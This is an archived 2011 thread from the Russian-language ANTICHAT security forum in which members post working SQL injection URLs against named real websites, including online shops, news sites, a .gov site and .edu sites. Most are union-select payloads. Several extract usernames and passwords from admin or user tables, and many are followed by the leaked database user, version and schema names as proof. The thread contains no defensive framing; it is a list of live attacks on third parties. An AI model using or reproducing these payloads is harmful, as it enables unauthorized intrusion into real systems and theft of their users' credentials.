HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13901  
Старый 30.04.2011, 01:20
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

PR: 4

Цитата:
Сообщение от None  
http://artwithaheart.us/pages.php?pid=5%20and%201=2+union+select+1,2,3,%28 0x3120616e6420313d3220756e696f6e2073656c6563742031 2c322c332c67726f75705f636f6e636174286c6e616d652c30 7833612c706173732c307833612c656d61696c292066726f6d 207573657273202d2d2031%29,5,6,7,8,9,10,11,12
 
Ответить с цитированием

  #13902  
Старый 30.04.2011, 03:04
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

EDU POWER =)

http://www.esne.edu/noticias2.php?info=Noticias&Id=-354+union+select+1,user%28%29,3,4,5--+
 
Ответить с цитированием

  #13903  
Старый 30.04.2011, 08:43
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

Freece.com : PR - 4

MSSQL VERSION:Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 (Build 7600: )

DATABASEharmcon

USERNAMEharmCon_reader

VULN SCRIPT PATH:\www\FreeCE_classic\www\forum\Forum_Details.a sp

Exploit:

Цитата:
Сообщение от None  
http://www.freece.com/forum/Forum_Details.asp?dbForumID=1+or+1=(SELECT+TOP+1+T ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_NAME+NOT+IN+('vwCertInvoice','tbBlogRSS','tbCou ntry','vwClassQuestion','vwEventEval','tbCardType' ,'vwInvoice','tbCCIDcodes','vwClassQuestionResults ','tbCCTranType','tbClassAnswers','tbClassChoice', 'tbCertRequest','Temp','tbClassGrade','tbInstructo rApprove','tbeTrack','dtproperties','tbClassQuesti on','tbInstApproveDetails','TEMP_NewLogins','tbMem AutoRenewTrack','tbDocuments','tbInvoice','tbEmail Addresses','TEMP_NewState','tbEmailJob','TEMP_Stat eCodes','tbEvaluation','TEMP_ZipCodes','tbEventDoc s','TEMP_NewEmails','tbEventHomePage','TEMP_Countr yCodes','tbCustomerImportRoles','tbCustomerMailLis t','tbEventType','tbEvMailDocs','vwBrokerReportInv oice','tbFilter_Competitor','tbFilter_DirtyWord',' tbOutComeSurvey','tbMailRefer','tbForum','tbForumM essage','tbInstructorConflict','tbInstructors','tb MemberPackage','tbOnLocationClasses','tbSurveyPart icipants','tblForums','tbInstHonorStatus','Temp_Jo sh','tbLinks','tbInstHonorDetails','tbMemberCoupon ','tbLiveChat','tbInstHonorarium','tbLiveImages',' i td..'))--
IMPORTANT TABLES:

tbEmailAddresses

tbForum

tbInstructors

tblUsers

-User_ID

-UserName

-Password
 
Ответить с цитированием

  #13904  
Старый 30.04.2011, 17:29
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от None  
http://ochki.ru/retail/shops/search/?city=1&collection=-escada'+union+select+1,concat_ws(0x3a,login,passwo rd),3,4,5,6+from+ochki_cms_users+limit+1,1+--+'
Цитата:
Сообщение от None  
http://www.dushka.ru/gstore.phtm?g=-11+union+select+1,version()--
.......
 
Ответить с цитированием

  #13905  
Старый 01.05.2011, 13:17
assinjeans
Guest
Сообщений: n/a
Провел на форуме:
5632

Репутация: 0
По умолчанию

http://www.azizbehich.com/news.php?id=-132+union+select+1,2,3,version(),user(),6,7,8,9,10 +--

4версия=(
 
Ответить с цитированием

  #13906  
Старый 01.05.2011, 21:17
ubi
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340

Репутация: 0
По умолчанию



Код:
Code:
http://sportpickgoods.com/view.php?id=-61738+union+select+1,concat_ws(0x3a,name,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tb_admin--+
 
Ответить с цитированием

  #13907  
Старый 01.05.2011, 22:57
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
Провел на форуме:
487591

Репутация: 43
По умолчанию

Код:
Code:
http://www.elavik.ru/catalog.php?action=goods&id=-177+union+select+version%28%29,2+--+
5.1.41-log
 
Ответить с цитированием

  #13908  
Старый 02.05.2011, 03:51
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

gov*no

http://www.bryantx.gov/include/press_release.asp?id=-1107/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,user%28%29,10,11,12--+
 
Ответить с цитированием

  #13909  
Старый 02.05.2011, 15:08
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

http://portalxm.com/index.php?id=1'+and+1=0+union+select+1,2,3,group_c oncat(table_name+separator+0x3a),5,6,7,8,9+from+in formation_schema.tables+where+table_schema=0x76696 e746167645f617a697a/*
 
Ответить с цитированием

  #13910  
Старый 02.05.2011, 17:30
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

тИЦ 600

http://www.efko.ru/page.php?id=37'+union+all+select+1,2,3,4,5,6,7,8,9 ,10,11,concat_ws(0x3a,user(),database(),version())--+

Вывод в Location: The requested URL /newefko@localhost:newefko2:5.0.77-log was not found on this server.

-------------------

EDU:

http://casgroup.fiu.edu/dll/events.php?id=459+and+1=2+union+select+1,UNHEX(HEX (concat_ws(0x3a,user(),database(),version()))),3,4 ,5,6,7,8,9--+

casweb@GOPANTHER.fiu.edu:cas:4.1.14-nt-log

-------------------

http://globalanuncio.com/view.php?id=56688+and+1=2+UnIon+selECt+1,2,3,4,5,6 ,7,8,9,10,11,concat_ws(0x3a,user(),version(),datab ase()),13,14,15,16,17,18,19,20,21--+

globaldbuser@localhost:5.0.77:globalanuncio

-------------------

http://onlineoffshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb'+UNION+SELECT+1,2,3,conca t_ws(0x3a,user(),version(),database())--+

calculator@cgi1401.int.bizland.net:5.0.91-lognlineoffshoredb

------------------

http://pole1.ru/tovar.php?id=8+and+1=2+union+select+1,2,UNHEX(HEX( concat_ws(0x3a,user(),version(),database()))),4,5, 6,7--+

aqq7328_strina@localhost:5.0.92-community-log:aqq7328_lopata

"Чудо лопата"

--------------------

Шоп

http://www.arttoframes.com/cartmanager_search.php?parent_sku=cdm-144-FRBW26061&size=36x12&color=215'+or+(select+count(* )+from+(select+1+union+select+2+union+select+3)x+g roup+by+concat(version(),floor(rand(0)*2)))--+

Duplicate entry '5.0.451' for key 1

-----------------

http://www.bienesonline.com/venezuela/inmobiliarias.php?ID=15+and+1=2+union+select+conca t_ws(0x3a,user(),version(),database())--+

admin_bieneson@localhost:5.0.67-community-log:admin_bienes_venezuela

-----------------

http://www.birdjam.com/article.php?gid=0'&hilow=asc&monyr=4-2011&page=twitch_hiscores'+and+1=2+union+select+1, 2,3,4,concat_ws(0x3a,user(),version(),database()), 6,7,8,9,10,11--+

birdjam2@localhost:5.0.27:birdjam2

-----------------

http://www.cymbalhouse.com/shopping/pgm-more_information.php?id=1602'+and+1=2+/*!UnIon*/+selECt+1,2,3,4,5,6,7,concat_ws(0x3a,user(),versio n(),database()),9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51--+

zilze3_sope1@localhost:5.1.52:zilze3_sope1

-------------------

ВсеМайки.РУ - крупный сайт по продаже футболок со своей ПП.

http://www.vsemayki.ru/basket_to.php?id=795'+and+1=2+union+select+concat_ ws(0x3a,user(),version(),database()),2--+&color=red&size=M%20%2846-48%29&model=man&hand=short&num=1

vsemayki_ru@server.vsemayki.ru:5.1.50-rel11.4-log:vsemayki_ru

------------------

http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+ 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6,7,8,9,10,11,12,13,14,15--+

smdaily2@localhost:4.0.25:smdaily2
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ